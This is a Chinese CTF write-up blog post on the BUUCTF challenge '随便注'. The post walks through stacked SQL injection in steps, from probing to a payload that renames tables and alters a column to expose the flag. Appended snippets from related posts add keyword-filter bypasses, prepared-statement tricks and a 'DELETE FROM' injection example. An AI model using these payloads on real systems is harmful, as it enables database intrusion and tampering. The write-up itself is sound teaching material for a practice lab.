BUU WEB [强网杯 2019]随便注

最新推荐文章于 2024-01-24 16:02:58 发布
最新推荐文章于 2024-01-24 16:02:58 发布
阅读量260 收藏 1
点赞数 1
分类专栏: WP
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/star_feather/article/details/112833568
版权

打开网页,只有一个1,直接提交回显出数据,提交2回显数据,提交其他的就没有回显了。
在这里插入图片描述
根据题目“随便注”初步判断它应该是一个SQL注入,尝试一下 1’ ,报错:
在这里插入图片描述
说明我们的判断是正确的,接下来就是正常程序:
order by报字段数:

1' order by 2 #

在这里插入图片描述
到三时报错,说明有两个字段,
联合查询报库名:

1' union select1,2#

在这里插入图片描述
得到的回复却是他过滤了一些关键字。
关于preg_match函数可参考菜鸟教程:
https://www.runoob.com/php/php-preg_match.html

但是他没有过滤show,我们可以尝试一下堆叠注入:

1';show databases;#

在这里插入图片描述
回显出数据,说明可以使用堆叠注入,接下来用堆叠注入来差表名:

1';show tables;#

在这里插入图片描述
得到两个表名,以此查询两个表的字段:

1';show columns from `1919810931114514`;#

1';show columns from words;#

1919810931114514表:
在这里插入图片描述
words表:
在这里插入图片描述
因为很多关键字被过滤的,正常的查询数据库数据的语句没办法使用,接下来就该充分发挥网络的作用啦!

经我查WP得到,需要来点骚操作:

首先我们通过这两个表的字段,我们可以发现,最上边回显的内容是words表中的id和data两列的数据,所以我们是不是可以想办法把words表中的某列内容给替换成flag,将flag换进words里或者直接让他回显1919810931114514表中的内容。
因为本菜鸡知识的限制,再加上并没有在网上找到第一种的解法,我猜测是这种解法中的某个关键字在过滤表中,或者根本没有这个语句,或者没法使用这个语句(SQL语句我已经忘得差不多了,若有大佬指点则感激不尽!)。
所以这里我们使用第二种方法,让他回显1919810931114514表中的数据,更改默认显示表不现实,那就把这个表改一下名字,让他变成words表来显示出flag。
具体实施就是:

0';rename table words to words1;rename table `1919810931114514` to words;alter table words change flag id varchar(100) CHARACTER SET utf8 COLLATE utf8_general_ci NOT NULL;show columns from words ;#

先将words表的名字修改了,改为words1(其他什么都可以),因为表不能同名,然后把1919810931114514表名改为words,再将字段flag改为id(如果改为data的话需要再加一列id)
在这里插入图片描述
修改成功后,再输入万能密码就会得到flag了。
在这里插入图片描述
再查表就会发现表已经被修改了:
在这里插入图片描述

还有一种预处理的方式,本菜鸡并未整明白,有兴趣了解学习的请参考这篇文章:
https://www.cnblogs.com/wjw-zm/p/12359735.html
(若作者介意请私信联系删除!!!)

BUUCTF系列 // [强网2019] 随便
qq_45805420的博客
09-23 712
前言 本题知识点:SQL堆叠入 WP 打开题目,很明显的提示我们应该是SQL入了 So,先按照一般的流程,尝试基本的探测姿势 1. 探测有无入 1' 报错 1'--+ 报错 1'# 正常有回显 1' and 1=1# 正常有回显 1' and 1=2# 正常无回显 可知存在入,且 --+ 释被过滤,# 释可用 2. 尝试获取列数 1' order by 1# 正常有回显 1' order by 2# 正常有回显 1' order by 3# 报错 用 order by
buuctf web [强网 2019]高明的黑客
m0_46412682的博客
07-20 742
buuctf web [强网 2019]高明的黑客 开始的页面 既然页面上有提示,我们就输入www.tar.gz 有文件压缩包,我们下载下来,压缩打开后,有几千个文件 这里我们随便打开一个文件,这里有很多shell,但是很多是用不了的,所以要用python来测试,不可能手动 import requests import os import re import threading import time session = requests.Session() session.keep_
BUUCTF】web强网2019随便
12-14
开始入: 1’ : 报错 1’ #:回显正常 1’ order by 1 #: 正常(经测试列数为2–此处小白暗自窃喜) 1’ union select 1,2#: 回显 如图 看来此方法是行不通了,但经过苦苦寻求,了解到了堆叠入: 库:1’;show databases;# 得到数据库 表:1’;show tables;# 得到俩个表 列:1’;show columns from ‘表名’;# 这里意表名为数字的要加反引号 “ :在网上百度发现 得到 一个带有flag的字段 和 另一个 可查询的表 flag表:可查询表: 到这里虽然发现flag 但是select已经被ban了所
buu——web
weixin_73668856的博客
11-29 493
新手web
BUUCTF web 随便
H4ppyD0g的博客
09-19 792
堆叠入 在SQL中,分号是用来表示一条sql语句的结束。如果在 ; 结束一个sql语句后继续构造下一条语句,效果就是分别执行两条sql语句。由于两条语句堆叠在同一行,而不是原本应该各自占据一行,所以这种入成为堆叠入。 意1 当数字型字符作为字段、表、库名查询时,应该用反单引号括起来 输入 1 没有报错 1' 报错,证明存在入 1' # 没有报错 1' orde...
BUUCTF【WEB】题:随便
于高山之巅,方见大河奔涌;于群峰之上,更觉长风浩荡。
11-12 500
可以发现,1919810931114514表中有个名为 flag 的字段,很可能该字段的值就是真正的 flag;:预编译相当于定一个语句相同,参数不同的Mysql模板,我们可以通过预编译的方式,绕过特定的字符过滤。进去之后,发现就一个输入框,测试一下是否存在 SQL 入,输入万能语句:1' or 1 = 1#将 select 转换成对应的 ASCII 码,从而绕过对 select 的过滤。发现表都爆出来了,说明存在 SQL 入漏洞,进一步测试一些其他语句是否可行。举例:查询 id = 1 的用户。
BUUCTF-随便(easy_sql)
weixin_51383898的博客
10-13 964
启动靶机,首先有一个输入框,提交查询,返回一个数组将数值改成3,页面没有显示输入2,有结果,最大输入为2输入1'出现报错,参数为字符型,需要闭合单引号出现报错,尝试报错入,被过滤了使用联合入,过滤了关键字select,没有用尝试使用万能语句,好像没啥用,得到的信息和flag没有关联尝试使用堆叠入,成功了发现有个数据库,查看该数据库下有哪些表有个FLAG_TABLE表,查看table表有哪些字段不是flag???,看来这个数据库不得行进入supersqli。
2019强网upload
m0_61448651的博客
07-21 824
2019强网upload
BUUCTF-CRYPTO-强网2019 Copperstudy
zippo1234的博客
11-01 3304
BUUCTF-CRYPTO-强网2019 Copperstudy[强网2019] Copperstudy题目分析开始1.题目2.第0层3.第1层4.第2层5.第3层6.第4层7.第5层8.第6层9.get flag结语 每天一题,只能多不能少 [强网2019] Copperstudy 题目分析 RSA套娃,各种类型的RSA,对于我现在的水平来说真的是难于上青天。鉴于道奇时隔32年又夺冠军(28日的事了),今天就先记录下来。以后慢慢看 hash破解 e=3 已知p高位攻击 已知d低位攻击 低加密指数广
BUUCTF 强网2019 Copperstudy
walker_feng的博客
09-30 1707
强网2019 Copperstudy ![强网2019](https://img-blog.csdnimg.cn/20200930195613457.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3dhbGtlcl9mZW5n,size_16,color_FFFFFF,t_70#pic_center)   做之前很爽,做之后更爽 前提说
BUUCTF——随便
weixin_45864041的博客
09-21 790
看到题目我们先试着正常查询 当上传的数据被直接显示在了URL中,很有可能这里存在sql入漏洞,接下来,我们可以对猜想进行验证。 通过上面的验证,我们可以直到这里存在sql入漏洞,并且传递的参数被单引号包裹 从上面可以看到,这里过滤了一些字符,导致我们不能用联合查找的方式进行入,所以我们换一个思路,看一看是否可以进行堆叠入 通过上面的测试可以看到,可以进行堆叠入。 先查表。 查列名,在这里可以看到数字这张表里有flag。 但是select被过滤了,我们无法得到fl..
buucrf-web-随便
weixin_43345082的博客
08-16 1054
又学到个姿势 这道题是sql堆叠入 堆叠入自行百度 同时有过滤 做法是使用mysql预定义语句 PREPARE stmt from '你的sql语句'; EXECUTE stmt (如果sql有参数的话, USING xxx,xxx); // 这里USING的只能是会话变量 DEALLOCATE PREPARE stmt; 这三句话分别就是: 预定义好sql语句 执行预定义的sql 释放...
buuctf [强网 2019]随便
qq_1873822的博客
03-01 302
堆叠入原理 在SQL中,分号(;)是用来表示一条sql语句的结束。试想一下我们在 ; 结束一个sql语句后继续构造下一条语句,会不会一起执行?因此这个想法也就造就了堆叠入。而union injection(联合入)也是将两条语句合并在一起,两者之间有什么区别么?区别就在于union 或者union all执行的语句类型是有限的,可以用来执行查询语句,而堆叠入可以执行的是任意的语句。例如以下这个例子。用户输入:1; DELETE FROM products服务器端生成的sql语句为: Select *
[强网 2019]随便
Braindance
03-03 161
根据题目尝试sql入,单引号报错,单引号加释无报错,说明存在sql入,当测试输入select时返回过滤的黑名单: return preg_match("/select|update|delete|drop|insert|where|\./i",$inject); 这道题使用的是堆叠入,原理 在SQL中,分号(;)是用来表示一条sql语句的结束。试想一下我们在 ; 结束一个sql语句后继续构造下一条语句,会不会一起执行?因此这个想法也就造就了堆叠入。而union injection(联合入).
BUUWEB [HCTF 2018]WarmUp
star_feather的博客
01-16 332
对于我这种新人菜鸡来说,如果拿到web题不知道是哪方面的话,一般就是F12查看源代码,抓包,扫描挨个试试看能找到什么线索。在buu上这道题给了提示,是代码审计,打开网址后是一个滑稽,没有代码,既然是代码审计,网页又没有显示代码也没文件,那一般就是审计源代码,查看页面源代码,可以发现一个明显的提示,source.php一般就是存放源代码的文件了,在原网页上包含该文件,即可看到源代码。 审计是我们需要先了解几个函数的作用: isset(): 判断变量是否声明; is_string(): 判断变量是否是字符串;
buu-WEB-不是文件上传
最新发布
m0_52061428的博客
01-24 531
他将传入的数据中的" * "替换成了"\0\0\0",符合这一要求的只有我们构建的序列化语句,所以我们也要进行操作。大致就是这么运行的,helper.php中没有被运行的有view_files()和__destruct()先快速审计一下,发现其余两个文件都在包含helper.php,所以着重看helper.php。这题主要考验代码审计能力和对sql的熟悉程度,不过有一说一,题量确实大。这里让我联想到了反序列化。_destruct被触发时,view_file才会被调用,并且view。这是他的三个php文件。
BUU WEB [极客大挑战 2019]Http
star_feather的博客
01-26 395
打开网址,是一个正常的广告网站,老规矩,先查看源代码,发现最后一句话的中间夹杂着一个文件: 直接点开访问: 提示必须从这个网址访问,但这个网址里面并没有这个链接,那要怎么办?题目是http,那么还记得刚开始学http协议时抓包并介绍的信息头吗?那解决方法就来了!抓包改包! 头部的信息介绍请看这篇(赶紧增加一下访问量,哈哈):https://blog.youkuaiyun.com/star_feather/article/details/104468559 回归正题,我们先抓包,为了方便将包发送到重发器,然后在头部加
buu web:Ping Ping Ping(命令执行)
m0_55378150的博客
04-07 868
打开靶机,提示get传参 直接?ip=127.0.0.1 返回ping的结果,接着试一下命令执行?ip=127.0.0.1|ls 发现疑似flag的flag.php,试一下能不能直接读出来?ip=127.0.0.1|cat flag.php 果然没这么简单,空格被过滤了,百度了一下绕过的方法 cat flag.txt cat${IFS}flag.txt cat$IFS$9flag.txt cat<flag.txt cat<>flag.txt 挨个试一下,发现..
buu web:warm up(PHP代码审计)
m0_55378150的博客
03-28 2699
启动靶机,发现了这么个玩意 查看一手源代码 <!DOCTYPE html> <html lang="en"> <head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <meta http-equiv="X-UA-Compatible" content="ie=edg
buu ctf web进阶]ssti
08-23
buu ctf web进阶中,ssti代表 Side Template Injection,是一种应用程序中的安全漏洞。通过此漏洞,攻击者可以入恶意代码到服务器端的模板引擎,从而执行任意代码或获取敏感信息。这种漏洞可能导致服务器被入侵...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值